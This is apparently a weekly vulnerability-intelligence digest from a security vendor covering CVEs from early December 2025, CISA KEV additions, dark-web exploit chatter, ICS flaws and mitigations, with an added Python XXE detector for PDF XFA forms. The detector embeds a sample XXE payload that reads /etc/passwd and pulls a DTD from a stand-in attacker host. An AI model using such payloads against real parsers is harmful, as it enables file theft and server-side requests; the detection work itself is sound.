CRIL reports on this week's IT vulnerabilities, highlighting zero-days, active exploits, and trending threats across IT and industrial networks.
Last week's reports from Cyble Research & Intelligence Labs (CRIL) to clients highlighted new flaws disclosed from December 03 through December 09, 2025, including newly disclosed IT vulnerabilities, ICS vulnerabilities, active exploitation attempts, and dark-web discussions around weaponized CVEs. Drawing on CISA alerts, CRIL's global sensor network, and Cyble's vulnerability intelligence platform, the findings outline rapid PoC release cycles, persistent automated exploitation, and targeted attacks against critical infrastructure.
CRIL's threat-hunting infrastructure, deployed across multiple regions, continues to record real-time malicious activity, including exploit attempts, brute-force intrusions, malware injections, and financially motivated attacks. There was a sustained rise in botnet-driven campaigns and opportunistic exploitation of internet-exposed and misconfigured industrial devices throughout the reporting period.
More broadly, CRIL's weekly insight shows a sharp increase in newly disclosed vulnerabilities. The Vulnerability Intelligence (VI) module identified 1,378 vulnerabilities this week, including over 131 with publicly available PoCs and three new zero-days.
The Week's Top IT Vulnerabilities
CRIL's weekly vulnerability intelligence analysis found several high-impact issues affecting enterprise technologies, software ecosystems, and internet-facing applications. Major vendors reporting significant vulnerability counts included Linux distributions, Google, Microsoft, Siemens, and Nextcloud.
A subset of critical vulnerabilities drew community and industry attention:
- CVE-2025-67494: A critical server-side request forgery (SSRF) flaw in ZITADEL, enabling unauthorized network pivoting and data exposure.
- CVE-2025-66516: A severe XML External Entity (XXE) vulnerability in Apache Tika affecting modules such as tika-core, tika-pdf-module, and tika-parsers.
These IT vulnerabilities present a direct risk to organizations because they can enable unauthorized access, data theft, and remote code execution. Across all disclosures, CRIL identified 68 vulnerabilities rated critical under CVSS v3.1 and 23 rated critical under CVSS v4.0, making it another high-activity week in vulnerability disclosure trends.
CISA – Known Exploited Vulnerabilities (KEV) Catalogue
Between December 3 and December 9, 2025, CISA added six new exploited vulnerabilities to its KEV catalog.
Notable additions include:
- CVE-2025-6218: A directory traversal flaw in RARLAB WinRAR that allows remote code execution (RCE).
- CVE-2025-55182: A critical pre-authentication RCE in React Server Components (RSC) that leverages unsafe deserialization in the "Flight" protocol.
Exploitation of CVE-2025-55182 began around December 08, using payloads that diverged from the PoC publicly released by researchers on December 04. The variant techniques suggest rapid adaptation by attackers following disclosure.
Notable Vulnerabilities Discussed in Open-Source Communities
CRIL identified several trending vulnerabilities drawing attention across open-source security and research forums.
Key discussions included:
- CVE-2025-62221: A use-after-free elevation of privilege vulnerability in the Windows Cloud Files Mini Filter Driver. A local attacker could gain SYSTEM-level privileges, and the flaw can be chained with phishing or browser exploits for full host compromise.
- CVE-2025-10573: A critical stored XSS vulnerability in Ivanti Endpoint Manager, allowing remote unauthenticated attackers to embed malicious JavaScript that executes when an administrator views the dashboard.
Vulnerabilities Under Discussion on the Dark Web
CRIL's dark-web monitoring identified several vulnerabilities being actively discussed, traded, or weaponized by threat actors:
- CVE-2025-6440: A critical arbitrary file upload vulnerability in the WooCommerce Designer Pro plugin for WordPress (also distributed with the Pricom Printing Company & Design Services theme). It allows unauthenticated file upload and remote code execution via malicious PHP web shells.
- CVE-2025-55182: Also referred to as "React2Shell" or "React4Shell," and actively weaponized on underground forums. The flaw affects React 19's Server Components Flight protocol and frameworks such as Next.js.
- CVE-2025-66516: A severe XXE vulnerability in Apache Tika. The administrator of the "Proxy Bar" Telegram channel circulated exploit material demonstrating how malicious PDF files with embedded XFA forms could achieve arbitrary file read, SSRF, denial of service, and, in some cases, remote code execution.
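The XFA entry above describes the standard XXE chain: the XML document embedded in the PDF declares an external entity, and a parser that resolves it reads a local file or makes a server-side request on the attacker's behalf. The following Python is an added example, not Cyble's or Apache Tika's code, showing the pre-parse check a document-processing pipeline can apply to XML extracted from a PDF's XFA stream before handing it to any parser. The two XFA samples and the attacker.invalid host are constructed for illustration, and extraction of the XML bytes from the PDF container is assumed to have already happened.

```python
"""Pre-parse XXE check for XML pulled out of a PDF (for example an XFA form stream)."""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed samples for this example (not taken from any advisory or exploit):
# an XFA/XDP document carrying an XXE payload, and a benign one.
MALICIOUS_XFA = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd">
  %dtd;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template><subform><field name="f1"><value><text>&xxe;</text></value></field></subform></template>
</xdp:xdp>"""

BENIGN_XFA = b"""<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <template><subform><field name="f1"><value><text>hello</text></value></field></subform></template>
</xdp:xdp>"""

# Any DOCTYPE at all: XFA form data never needs a DTD, so its presence is itself suspicious.
_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# Entity declarations with an external identifier. The optional '%' marks a parameter
# entity, which blind/out-of-band XXE variants use to pull a remote DTD; PUBLIC
# declarations carry a public ID before the URI, which the non-capturing group skips.
_EXT_ENTITY = re.compile(
    rb"<!ENTITY\s+(%\s*)?([^\s>]+)\s+(SYSTEM|PUBLIC)\s+(?:[\"'][^\"']*[\"']\s+)?[\"']([^\"']*)[\"']",
    re.IGNORECASE,
)


def find_external_entities(xml_bytes: bytes) -> List[Tuple[str, str, str]]:
    """Return (entity name, 'general' or 'parameter', URI) for each external entity declared."""
    return [
        (m.group(2).decode("utf-8", "replace"),
         "parameter" if m.group(1) else "general",
         m.group(4).decode("utf-8", "replace"))
        for m in _EXT_ENTITY.finditer(xml_bytes)
    ]


def parse_xfa_hardened(xml_bytes: bytes) -> ET.Element:
    """Parse XFA XML only if it declares no DOCTYPE; otherwise raise, reporting what was found.

    Refusing the DOCTYPE outright (the policy defusedxml applies) removes XXE file read and
    SSRF, and also entity-expansion ("billion laughs") denial of service, in one step.
    """
    if _DOCTYPE.search(xml_bytes):
        raise ValueError(f"DOCTYPE rejected; external entities: {find_external_entities(xml_bytes)}")
    return ET.fromstring(xml_bytes)


def is_safe_xfa(xml_bytes: bytes) -> bool:
    """True if the XML passes the hardened parse, False if it was rejected or is malformed."""
    try:
        parse_xfa_hardened(xml_bytes)
        return True
    except (ValueError, ET.ParseError):
        return False


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_XFA), ("benign", BENIGN_XFA)):
        verdict = "safe" if is_safe_xfa(sample) else "rejected"
        print(label, verdict, find_external_entities(sample))
```

The check rejects any DOCTYPE rather than trying to enumerate dangerous constructs; in Java code the equivalent is enabling the `http://apache.org/xml/features/disallow-doctype-decl` feature on the JAXP `DocumentBuilderFactory` or SAX parser before parsing. Parameter entities are reported separately because blind XXE variants fetch a remote DTD through them even when the general entity never appears in the parsed output, so a scanner that only looks for `&name;` references would miss them.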
CRIL's vulnerability intelligence timeline notes:
| CVE | Product | CVE Release | DW Capture | PoC |
|---|---|---|---|---|
| CVE-2025-6440 | WooCommerce Designer Pro | Oct 24, 2025 | Dec 03, 2025 | Yes |
| CVE-2025-55182 | React Server Components | Dec 03, 2025 | Dec 05, 2025 | Yes |
| CVE-2025-66516 | Apache Tika Modules | Dec 04, 2025 | Dec 08, 2025 | Yes |
Top ICS Vulnerabilities Tracked This Week
CRIL highlighted several ICS vulnerabilities affecting industrial vendors across the energy, manufacturing, and commercial facilities sectors.
Key issues included:
- Sunbird – DCIM dcTrack & Power IQ (≤ 9.2.0): Authentication bypass and hard-coded credentials vulnerabilities (CVSS 6.5 and 6.7), risking unauthorized access and credential compromise.
- Johnson Controls OpenBlue Workplace (2025.1.2 and prior): A CVSS 9.3 forced browsing vulnerability enabling unauthorized access to sensitive operations in critical infrastructure environments.
Across the ICS landscape, most vulnerabilities were of medium severity, while the commercial facilities, critical manufacturing, and energy sectors accounted for 43% of total incidents. Multi-sector issues, spanning IT, government, healthcare, and transportation, accounted for a further 29%.
Recommendations and Mitigations
CRIL's report reiterates essential mitigation steps:
- Apply all vendor patches promptly, particularly for vulnerabilities listed in the KEV catalog.
- Implement a structured patch management program covering testing, deployment, and verification.
- Segment networks to isolate critical systems and reduce lateral movement.
- Deploy comprehensive monitoring and logging with SIEM correlation.
- Track alerts from vendors, CERTs, and government authorities.
- Conduct routine VAPT exercises and security audits.
- Maintain visibility into internal and external assets.
- Enforce strong password policies, replace all default credentials, and adopt MFA across all environments.
Conclusion
The wide range of vulnerabilities identified this week highlights the expanding threat landscape facing industrial and operational environments. Security teams must act quickly and focus on risk-based vulnerability management to protect critical systems.
Key practices, such as network segmentation, restricting exposed assets, applying Zero-Trust principles, maintaining resilient backups, hardening configurations, and continuous monitoring, remain essential for reducing attack surface and improving incident response readiness.
Cyble's attack surface management solutions can support these efforts by detecting exposures across network and cloud environments, prioritizing remediation, and providing early indicators of potential cyberattacks. To see how Cyble can strengthen your industrial security posture, request a demo today.

